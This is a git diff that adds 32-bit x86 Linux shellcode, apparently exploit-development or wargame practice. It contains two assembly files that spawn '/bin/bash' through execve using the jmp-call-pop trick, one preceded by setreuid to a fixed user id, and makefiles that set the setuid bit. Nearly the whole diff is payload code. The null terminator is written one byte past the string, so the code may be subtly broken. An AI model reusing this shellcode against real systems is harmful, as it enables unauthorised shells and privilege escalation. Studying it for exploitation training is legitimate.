new file: exec_cmd/makefile

new file:   exec_cmd/shell
	new file:   exec_cmd/shell.asm
	new file:   exec_cmd/shell.o
	new file:   exec_cmd_setuid/makefile
	new file:   exec_cmd_setuid/shell
	new file:   exec_cmd_setuid/shell.asm
	new file:   exec_cmd_setuid/shell.o

exec_cmd/makefile

@@ -0,0 +1,5 @@
+make:
+	nasm shell.asm -felf32 -o shell.o
+	ld -m elf_i386 shell.o -o shell -s
+	chmod u+s shell
+

exec_cmd/shell.asm

@@ -0,0 +1,19 @@
+global _start
+_start:
+jmp short data
+
+exploit:
+xor eax, eax
+xor ebx, ebx
+xor ecx, ecx
+pop edx
+mov [edx + 10], eax
+mov al, 11
+mov ebx, edx
+xor edx, edx
+int 0x80
+
+
+data:
+call exploit 
+cmd: db '/bin/bash'

exec_cmd_setuid/makefile

@@ -0,0 +1,5 @@
+make:
+	nasm shell.asm -felf32 -o shell.o
+	ld -m elf_i386 shell.o -o shell -s
+	chmod u+s shell
+

exec_cmd_setuid/shell.asm

@@ -0,0 +1,28 @@
+global _start
+_start:
+jmp short data
+
+exploit:
+
+xor edx, edx
+
+xor eax, eax ; set reuid
+xor ebx, ebx
+xor ecx, ecx
+mov al, 203
+mov bx, 14005 
+mov cx, 14005
+int 0x80
+
+xor eax, eax
+xor ebx, ebx
+xor ecx, ecx
+pop edx
+mov [edx + 10], eax
+mov al, 11
+mov ebx, cmd
+int 0x80
+
+data:
+call exploit ; this puts the address of where we're at (where the string is!) in the stack and jmps to start 
+cmd: db '/bin/bash'